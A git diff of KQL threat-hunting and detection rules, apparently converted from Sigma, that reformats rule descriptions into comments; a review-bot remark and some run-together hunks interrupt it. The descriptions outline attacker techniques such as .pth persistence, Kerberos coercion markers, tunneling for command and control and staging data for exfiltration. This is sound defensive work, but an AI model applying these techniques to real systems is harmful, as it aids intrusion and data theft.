-When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter."
-
+// From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios.
+// 1. Compressed file opened using 7zip.
+// 2. Compressed file opened using WinRar.
+// 3. Compressed file opened using native windows File Explorer capabilities.
+// When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter."
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql b/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql
index 71f64ba2..024887eb 100644
--- a/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql
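Review bot: The last new comment line in manual_execution_of_script_inside_of_a_compressed_file.kql ends with a stray double quote (`relevant script interpreter."`) that has no opening counterpart; it looks like a leftover from the quoting of the original description and should be dropped so the line ends at `script interpreter.`. While touching that line, "respected directories" presumably means "respective directories". The rest of the hunk (the numbered Selections 1-3) converts cleanly.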
+++ b/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql
@@ -3,7 +3,6 @@
 // Date: 2024-07-10
 // Level: low
 // Description: Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1204.002, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql b/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql
index 4ce07150..c7436eee 100644
--- a/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql
+++ b/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql
@@ -3,9 +3,8 @@
 // Date: 2017-03-13
 // Level: low
 // Description: Detects a network connection that was initiated from a PowerShell process.
-Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs.
-Use this rule as a basis for hunting for anomalies.
-
+// Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs.
+// Use this rule as a basis for hunting for anomalies.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.001, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql b/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql
index daf9a923..d9acc39b 100644
--- a/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql
+++ b/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql
@@ -3,8 +3,7 @@
 // Date: 2024-07-23
 // Level: informational
 // Description: Detects the use of software that is related to the University of California, Berkeley via metadata information.
-This indicates it may be related to BOINC software and can be used maliciously if unauthorized.
-
+// This indicates it may be related to BOINC software and can be used maliciously if unauthorized.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.defense-evasion, attack.t1553, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql b/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql
index c99aef84..3e07858a 100644
--- a/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql
+++ b/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql
@@ -3,10 +3,9 @@
 // Date: 2024-08-22
 // Level: low
 // Description: Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign.
-Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly.
-Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt".
-The typical use case of the "set /p=" command is to prompt the user for input.
-
+// Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly.
+// Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt".
+// The typical use case of the "set /p=" command is to prompt the user for input.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.defense-evasion, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql b/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql
index 18ae2197..7c0ea58c 100644
--- a/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql
+++ b/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql
@@ -3,8 +3,7 @@
 // Date: 2022-04-26
 // Level: medium
 // Description: Detects potentially suspicious child processes spawned by PowerShell.
-Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
-
+// Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.001, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql b/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql
index 5a76cf68..24fde261 100644
--- a/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql
+++ b/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql
@@ -3,9 +3,8 @@
 // Date: 2025-06-13
 // Level: low
 // Description: Detects execution of processes with image paths starting with WebDAV shares (\\), which might indicate malicious file execution from remote web shares.
-Execution of processes from WebDAV shares can be a sign of lateral movement or exploitation attempts, especially if the process is not a known legitimate application.
-Exploitation Attempt of vulnerabilities like CVE-2025-33053 also involves executing processes from WebDAV paths.
-
+// Execution of processes from WebDAV shares can be a sign of lateral movement or exploitation attempts, especially if the process is not a known legitimate application.
+// Exploitation Attempt of vulnerabilities like CVE-2025-33053 also involves executing processes from WebDAV paths.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.command-and-control, attack.lateral-movement, attack.t1105, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql
index dbe576c6..c346f388 100644
--- a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql
+++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql
@@ -3,9 +3,8 @@
 // Date: 2024-04-25
 // Level: medium
 // Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
-Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
-Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
-
+// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
+// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.006, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql
index 041a8a59..55513269 100644
--- a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql
+++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql
@@ -3,9 +3,8 @@
 // Date: 2024-04-25
 // Level: medium
 // Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
-Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
-Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
-
+// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
+// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.006, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql
index 911fbaca..d8ddfda8 100644
--- a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql
+++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql
@@ -3,9 +3,8 @@
 // Date: 2024-04-25
 // Level: medium
 // Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
-Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
-Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
-
+// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
+// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.006, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
index cf92648b..30ba515f 100644
--- a/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
+++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
@@ -3,7 +3,6 @@
 // Date: 2024-08-03
 // Level: medium
 // Description: Detects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.persistence, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
index d6bf6ad6..41a2ea1a 100644
--- a/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
+++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
@@ -3,8 +3,7 @@
 // Date: 2024-02-23
 // Level: medium
 // Description: Detects remote binary or command execution via the ScreenConnect Service.
-Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect
-
+// Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect
 // MITRE Tactic: Execution
 // Tags: attack.execution, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql b/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql
index c267b4c7..13e8da72 100644
--- a/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql
+++ b/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql
@@ -3,8 +3,7 @@
 // Date: 2022-02-23
 // Level: medium
 // Description: Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location.
-Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
-
+// Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql b/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql
index ef3542a6..86e6b006 100644
--- a/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql
+++ b/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql
@@ -3,8 +3,7 @@
 // Date: 2022-10-13
 // Level: medium
 // Description: Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.
-This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
-
+// This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.defense-evasion, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql b/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql
index c86edd2e..3839d209 100644
--- a/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql
+++ b/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql
@@ -3,8 +3,7 @@
 // Date: 2021-12-26
 // Level: low
 // Description: Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity.
-Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
-
+// Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
 // MITRE Tactic: Impact
 // Tags: attack.impact, attack.t1489, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql b/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql
index ff89e930..b8755fb6 100644
--- a/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql
+++ b/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql
@@ -3,7 +3,6 @@
 // Date: 2019-01-16
 // Level: medium
 // Description: Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors
-
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.t1505.003, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql b/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
index 5814347e..acba7761 100644
--- a/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
+++ b/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
@@ -3,9 +3,8 @@
 // Date: 2024-09-02
 // Level: low
 // Description: Detects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory.
-The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object.
-Investigation of the loading application and its behavior is required to determining if its malicious.
-
+// The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object.
+// Investigation of the loading application and its behavior is required to determining if its malicious.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql b/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql
index 89247aee..665416c7 100644
--- a/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql
+++ b/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql
@@ -3,7 +3,6 @@
 // Date: 2023-11-23
 // Level: medium
 // Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
-
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1059, detection.threat-hunting
diff --git a/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql b/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
index 48f96a88..af43a994 100644
--- a/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
+++ b/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
@@ -3,13 +3,12 @@
 // Date: 2025-06-20
 // Level: high
 // Description: Detects the presence of "UWhRC....AAYBAAAA" pattern in command line.
-The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
-Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
-It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
-to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.
-If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
-or checking for the presence of such records through the `nslookup` command.
-
+// The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
+// Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
+// It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
+// to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.
+// If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
+// or checking for the presence of such records through the `nslookup` command.
 // MITRE Tactic: Collection
 // Tags: attack.collection, attack.credential-access, attack.persistence, attack.privilege-escalation, attack.t1557.001, attack.t1187
diff --git a/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql b/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql
index 62d56887..58ea181f 100644
--- a/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql
+++ b/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql
@@ -3,8 +3,7 @@
 // Date: 2021-10-15
 // Level: low
 // Description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.
-Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
-
+// Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
 // MITRE Tactic: Collection
 // Tags: attack.collection, attack.t1115
 // False Positives:
diff --git a/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql b/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql
index 8bbba7e0..0054ce84 100644
--- a/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql
+++ b/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2023-12-19
 // Level: low
 // Description: Detects execution of "tar.exe" in order to create a compressed file.
-Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
-
+// Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
 // MITRE Tactic: Collection
 // Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
 // False Positives:
diff --git a/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql b/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql
index eb7cef68..64801bdb 100644
--- a/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql
+++ b/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql
@@ -3,8 +3,7 @@ // Date: 2023-12-19 // Level: low // Description: Detects execution of "tar.exe" in order to extract compressed file. -Adversaries may abuse various utilities in order to decompress data to avoid detection. - +// Adversaries may abuse various utilities in order to decompress data to avoid detection. // MITRE Tactic: Collection // Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 // False Positives: diff --git a/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql b/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql index a5bf0696..2527fbd7 100644 --- a/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql +++ b/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql @@ -3,8 +3,7 @@ // Date: 2021-07-20 // Level: medium // Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. -An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. - +// An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. // MITRE Tactic: Collection // Tags: attack.collection, attack.t1074.001 diff --git a/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql b/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql index f6041c74..f7b1c794 100644 --- a/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql 
+++ b/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql
@@ -3,8 +3,7 @@
 // Date: 2024-07-01
 // Level: medium
 // Description: Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups.
-Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803".
-
+// Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803".
 // MITRE Tactic: Collection
 // Tags: attack.collection, attack.t1113
 // False Positives:
diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql b/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql
index 755a8f4f..03288f4b 100644
--- a/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql
+++ b/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql
@@ -3,9 +3,8 @@
 // Date: 2024-06-02
 // Level: medium
 // Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value.
-Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
-This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
-
+// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
+// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
 // MITRE Tactic: Collection
 // Tags: attack.collection, attack.t1113
 // False Positives:
diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql b/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql
index 8ee5e5af..6bbdf733 100644
--- a/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql
+++ b/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql
@@ -3,9 +3,8 @@
 // Date: 2024-06-02
 // Level: medium
 // Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0".
-Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
-This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
-
+// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
+// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
 // MITRE Tactic: Collection
 // Tags: attack.collection, attack.t1113
 // False Positives:
diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql b/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql
index 56b912eb..fc2d0243 100644
--- a/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql
+++ b/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql
@@ -3,10 +3,9 @@
 // Date: 2024-06-02
 // Level: medium
 // Description: Detects the enabling of the Windows Recall feature via registry manipulation.
-Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0.
-Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
-This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
-
+// Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0.
+// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
+// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
 // MITRE Tactic: Collection
 // Tags: attack.collection, attack.t1113
 // False Positives:
diff --git a/KQL/rules/Command and Control/anydesk_temporary_artefact.kql b/KQL/rules/Command and Control/anydesk_temporary_artefact.kql
index 11daf9c7..1cfde36a 100644
--- a/KQL/rules/Command and Control/anydesk_temporary_artefact.kql
+++ b/KQL/rules/Command and Control/anydesk_temporary_artefact.kql
@@ -3,9 +3,8 @@
 // Date: 2022-02-11
 // Level: medium
 // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/cloudflared_portable_execution.kql b/KQL/rules/Command and Control/cloudflared_portable_execution.kql
index 7328340e..f1e0969e 100644
--- a/KQL/rules/Command and Control/cloudflared_portable_execution.kql
+++ b/KQL/rules/Command and Control/cloudflared_portable_execution.kql
@@ -3,7 +3,6 @@
 // Date: 2023-12-20
 // Level: medium
 // Description: Detects the execution of the "cloudflared" binary from a non standard location.
-
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1090.001
 // False Positives:
diff --git a/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql b/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql
index ee525a83..b41427df 100644
--- a/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql
+++ b/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2023-12-20
 // Level: medium
 // Description: Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB.
-The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.
-The tool has been observed in use by threat groups including Akira ransomware.
-
+// The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.
+// The tool has been observed in use by threat groups including Akira ransomware.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1090.001
 // False Positives:
diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql
index b19e54ae..fc272418 100644
--- a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql
+++ b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql
@@ -3,9 +3,8 @@
 // Date: 2024-06-17
 // Level: high
 // Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains.
-LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
-Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
-
+// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
+// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102
 // False Positives:
diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql
index b77e3af2..30f7151d 100644
--- a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql
+++ b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql
@@ -3,9 +3,8 @@
 // Date: 2024-06-17
 // Level: high
 // Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains.
-LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
-Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
-
+// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
+// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102
 // False Positives:
diff --git a/KQL/rules/Command and Control/finger_exe_execution.kql b/KQL/rules/Command and Control/finger_exe_execution.kql
index 965cbed0..4094dc43 100644
--- a/KQL/rules/Command and Control/finger_exe_execution.kql
+++ b/KQL/rules/Command and Control/finger_exe_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2021-02-24
 // Level: high
 // Description: Detects execution of the "finger.exe" utility.
-Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon.
-Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating.
-
+// Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon.
+// Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1105
 // False Positives:
